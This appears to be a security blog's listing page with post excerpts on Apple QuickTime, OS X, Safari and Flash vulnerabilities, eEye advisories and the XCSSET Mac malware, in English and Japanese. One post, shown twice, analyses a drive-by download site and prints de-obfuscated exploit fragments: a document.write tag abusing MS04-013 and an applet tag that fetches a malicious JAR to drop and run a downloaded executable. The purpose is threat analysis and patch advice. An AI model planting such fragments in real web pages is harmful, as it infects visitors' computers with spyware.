12月1日前後から Apple QuickTime のセキュリティホールに対する攻撃を行うWebページが存在していたことがわかりました。攻撃コードを含んだWebページにアクセスすると結果的に複数の不正プログラムが侵入してしまいます。現時点でApple社からはセキュリティホールを修正するアップデートはリリースされていない状態、つまり、「ゼロデイ攻撃」の状態です。今までに確認されている攻撃サイトはごく少数のため、攻撃に遭遇する危険性は低いものですが、当然攻撃の増加や拡散が考えられますので注意が必要です。 (さらに…)
続きを読むApple released a security update for their media player, Quicktime, which affects Windows and Mac users. The security flaws found in Quicktime players tend to crash or execute arbitrary code when exploited. More details about the security update here.
Next update is on Adobe Flash Player where an attacker can take control of the affected system upon successful exploitation of the vulnerability found in the player. Adobe tagged this vulnerability as critical and recommends software update on all Windows and Mac OS users of Adobe Flash Player versions 8.0.24.0 and earlier. More details about the update here.
It is advised that users apply security updates not only on the Operating Systems. Security updates should also be applied to third party softwares as these softwares can be an attack vector of malwares compromising your system even if your OS is fully patched.
Users can find the download page of the software updates mentioned by following the hyperlinks:
References:
続きを読む
Hi folks!
Yep, it’s time to upgrade your Quicktime media player to version 7.1 whether you’re a Windows OS or a Mac OS user (as long as you use Quicktime player).
This upgrade is released to fix security holes found in the media player. The upgrade fix security holes in viewing crafted images and movies (according to SANS). You may also read on the release notes for further details of the upgrade.
Meanwhile, while upgrading your Quicktime in your Mac OS, you should consider patching up your system with Apple’s Security Update 2006-003. Read on about the update here.
Visit Apple website for the Quicktime upgrade and Mac OS Security Update 2006-003.
References:
続きを読む
Yeah you know what I mean. After Apple updated OS X 10.4.5 to OS X 10.4.6 which addressed critical security vulnerabilities, there are other possible vulnerabilities found in the updated OS X. A guy, by the name Tom Ferris, claims to have found the following vulnerabilities in the updated OS X.
- Apple OS X 10.4.5 .tiff “LZWDecodeVector ()” Heap Overflow
- Apple OS X BOM ArchiveHelper .zip Heap Overflow
- Apple OS X Safari 2.0.3 Multiple Vulnerabilities
- Apple OS X 10.4.6 “ReadBMP ()” .bmp Heap Overflow
- Apple OS X 10.4.6 “CFAllocatorAllocate ()” .gif Heap Overflow
- Apple OS X 10.4.6 .tiff “_cg_TIFFSetField ()” DoS
- Apple OS X 10.4.6 .tiff “PredictorVSetField ()” Heap Overflow
The first vulnerability was patched in OS X 10.4.6 however the other vulnerabilities are claimed to be unpatched in Apple OS X 10.4.6 but are already reported to Apple.
All of these have been reported to product-security@apple.com around the beginning of this year. From what I have been told, they “will be fixed in the next security release”.
You may follow the following link for the original article.
By the way, users who haven’t patched their OS X machines are advised to update to Apple OS X 10.4.6. You may visit Apple’s update page here.
続きを読む
In light of recent vulnerabilities in MacOSX, Apple has released their Security Update 2006-001. I’ve browsed through some of the vulnerabilities, and it seems as if some of them are possible worm vectors for Mac. I’ll get to play around with these vulnerabilities in the next few weeks because we just got a Mac machine! Niiiiice. And oh, here’s a writeup from ISC on the recent Apple patches: http://isc.sans.org/diary.php?storyid=1160.
“…This update is very critical to install on your Mac OS X machines…”
続きを読む
An article had been published describing a flaw in Apple Safari Browser running on OS X. The flaw is said to cause immediate execution of files by just visiting a website.
An option in the browser “open ‘safe’ files after downloading” (activated by default), causes the browser to automatically execute safe files like zip. However a shellscript with no “shebang line” such as “#!/bin/bash” will be executed without user interaction. Read the article here for the full story.
For now it is highly recommended to disable the option “Open ‘safe’ files after downloading” until an update that fixes the flaw is made available.
Update(JJ, 21 February 2006 18:20:49)
Updates from ISC.
This actually looks more serious then we initially thought it is. The workaround specified above will prevent Safari from automatically executing the PoC file, but it looks like your machine is still vulnerable and it doesn’t need Safari to run this file at all.
Update(JJ, 23 February 2006 20:30:27)
More updates from ISC!
…the Mail application is vulnerable as well. What’s even worse, the attacker doesn’t need to send a ZIP archive; the shell script itself can be disguised to practically anything.
Here’s the link again: http://isc.sans.org/diary.php?storyid=1138続きを読む
eEye Digital Security has published four (4) advisories related to Apple Quicktime vulnerabilities. These vulnerabilities were marked as critical because they can cause remote arbitrary code execution. In effect, the attacker can control the affected system with the same privileges as the logged in user.
The following vulnerabilities are enumerated below with some short description.
Apple QuickTime STSD Atom Heap Overflow
The vulnerability allows a remote attacker to reliably overwrite heap memory with user-controlled data and execute arbitrary code in the context of the user who executed the player or application hosting the QuickTime plug-in.
Apple iTunes (QuickTime.qts) Heap Overflow
The vulnerability allows an attacker to reliably overwrite heap memory with user-controlled data and execute arbitrary code in the context of the user who executed iTunes.
Apple QuickTime QTIF Stack Overflow
There is a stack overflow in the way QuickTime processes qtif format files. An attacker can create a qtif file and send it to the user via email, web page, or qtif file with activex and can directy overflow a function pointer immediately used so it can bypass any stack overflow protection in systems such as xp sp2 and 2003 sp1.
Apple QuickTime Malformed GIF Heap Overflow
…a critical heap overflow in the Apple Quicktime player that allows for the execution of arbitrary code via a maliciously crafted GIF file.
This flaw has proven to allow for reliable control of data on the heap chunk and can be exploited via a web site by using ActiveX controls.
The following systems are affected by these vulnerabilities.
- Quicktime on Windows 2000
- Quicktime on Windows XP
- Quicktime on Mac OS X 10.3.9
- Apple iTunes on Windows 2000
- Apple iTunes on Windows XP
- Apple iTunes on OS X 10.3.9
Apple has released Apple QuickTime version 7.0.4 to solve these vulnerabilities. Mac OS X users should update their software by following the steps described in Apple’s web site. Windows 2000 and XP users should download Apple QuickTime 7.0.4.
By the way, the advisories were released the same date as Microsoft did on their latest security updates
続きを読む
New methods have surfaced, and the spyware threat has just gotten “smarter”. Some sites have already employed the use of various vulnerabilities in order to deploy a single file, banking on the hope that of these methods, one may prove to exploit an unpatched vulnerability to exploit the system.
Many sites have already employed this method of deploying malicious content into system, and here’s a view of what happens with our sample site.
Either by redirection or from whatever website, the user is is taken to <BLOCKED>/RC, a site which contains an ANI file exploit and 6 iframes that contains diffirent methods of pushing a certain file into a user’s system. Depending on the security employed by the system, and the patches that are put in place, the user’s PC may either execute one, two or all of the contents in the 6 iframes.
IFRAME 1: http://<BLOCKED>/RC/exp_4/index.htm
- The code is escaped three times before the malicious code is revealed. And even then, it is filled with garbage codes in order to confuse the scanner.
- Then the file downloaded from <BLOCKED>/RC/web.exe will be dropped and launched in the system.
FINAL CODE:
IFRAME 2:
- Same as IFRAME 1.
IFRAME 3: http://<BLOCKED>/RC/exp_sp6/index.htm
- This is also escaped three times, in a non-straightforward manner, before the final code is revealed.
- Then, a CHM file will be launched. And this CHM file will drop and launch web.exe by exploiting the the MS04-013 vulnerability, which is the same file launched by the earlier IFRAME.
FINAL CODE:
document.write(‘<object data=”ms-its:mhtml:file://c: c.mht!’+PATH+’::/logo.php” type=”text/x-scriptlet” >< /object >’);
IFRAME 4: http://<BLOCKED>/RC/exp_3/index.htm
- Escaped three times then the final code contains garbage codes to confuse the scanner.
- Then, the final code will launch web.exe using a vulnerability.
FINAL CODE:
IFRAME 5: http://<BLOCKED>/RC/exp_sp60/index.htm
- The code is clear for this part.
- It opens <BLOCKED>/RC/exp_sp60/int.htm which will execute: <BLOCKED>/RC/exp_sp60/final/int.hta
- the end result is similar to that of the earlear IFRAMEs.
IFRAME 6: http://<BLOCKED>/RC/exp_5/index.htm
- The code is still escaped three times before the final code is revealed.
- And the final code will execute both web.exe from <BLOCKED>/RC/web.exe and count.jar (JAVA_BYTEVER.A) from <BLOCKED>/RC/exp_5/count.jar
document.write(“<APPLET ARCHIVE=’count.jar’ CODE=’BlackBox.class’ WIDTH=1 HEIGHT=1>”);
document.write(“<PARAM NAME=’url’ VALUE='”+PATH+”‘>”);
document.write(““);
Sites that peddle spyware and their cohorts (downloaders and droppers), will employ all possible techniques just to push them to the user’s system. And for aggressive methods such as this, we need to be vigilant in putting the latest patches to secure our systems.
続きを読む
New methods have surfaced, and the spyware threat has just gotten “smarter”. Some sites have already employed the use of various vulnerabilities in order to deploy a single file, banking on the hope that of these methods, one may prove to exploit an unpatched vulnerability to exploit the system.
Many sites have already employed this method of deploying malicious content into system, and here’s a view of what happens with our sample site.
Either by redirection or from whatever website, the user is is taken to <BLOCKED>/RC, a site which contains an ANI file exploit and 6 iframes that contains diffirent methods of pushing a certain file into a user’s system. Depending on the security employed by the system, and the patches that are put in place, the user’s PC may either execute one, two or all of the contents in the 6 iframes.
IFRAME 1: http://<BLOCKED>/RC/exp_4/index.htm
- The code is escaped three times before the malicious code is revealed. And even then, it is filled with garbage codes in order to confuse the scanner.
- Then the file downloaded from <BLOCKED>/RC/web.exe will be dropped and launched in the system.
FINAL CODE:
IFRAME 2:
- Same as IFRAME 1.
IFRAME 3: http://<BLOCKED>/RC/exp_sp6/index.htm
- This is also escaped three times, in a non-straightforward manner, before the final code is revealed.
- Then, a CHM file will be launched. And this CHM file will drop and launch web.exe by exploiting the the MS04-013 vulnerability, which is the same file launched by the earlier IFRAME.
FINAL CODE:
document.write(‘<object data=”ms-its:mhtml:file://c: c.mht!’+PATH+’::/logo.php” type=”text/x-scriptlet” >< /object >’);
IFRAME 4: http://<BLOCKED>/RC/exp_3/index.htm
- Escaped three times then the final code contains garbage codes to confuse the scanner.
- Then, the final code will launch web.exe using a vulnerability.
FINAL CODE:
IFRAME 5: http://<BLOCKED>/RC/exp_sp60/index.htm
- The code is clear for this part.
- It opens <BLOCKED>/RC/exp_sp60/int.htm which will execute: <BLOCKED>/RC/exp_sp60/final/int.hta
- the end result is similar to that of the earlear IFRAMEs.
IFRAME 6: http://<BLOCKED>/RC/exp_5/index.htm
- The code is still escaped three times before the final code is revealed.
- And the final code will execute both web.exe from <BLOCKED>/RC/web.exe and count.jar (JAVA_BYTEVER.A) from <BLOCKED>/RC/exp_5/count.jar
document.write(“<APPLET ARCHIVE=’count.jar’ CODE=’BlackBox.class’ WIDTH=1 HEIGHT=1>”);
document.write(“<PARAM NAME=’url’ VALUE='”+PATH+”‘>”);
document.write(““);
Sites that peddle spyware and their cohorts (downloaders and droppers), will employ all possible techniques just to push them to the user’s system. And for aggressive methods such as this, we need to be vigilant in putting the latest patches to secure our systems.
続きを読む
トレンドマイクロでは、Xcodeの開発者向けプロジェクト関連で、異常な感染を確認しました。さらに調査を進めたところ、特定の開発者のXcodeプロジェクト全体にソースマルウェアが含まれており、不正ペイロードの取得につながることが判明しました。本記事では、Mac向けマルウェア「XCSSET」に関する調査結果を要約します。この攻撃の詳細については、こちらの技術的詳細から確認可能です。トレンドマイクロでは、最初に侵入するマルウェアを「TrojanSpy.MacOS.XCSSET.A」として、そしてコマンド&コントロール(C&C)に関連するファイルを「Backdoor.MacOS.XCSSET.A」として検出しました。
図1:ソースマルウェアを含むXcodeプロジェクトのサンプルとそのコンテンツの例 (さらに…)
続きを読む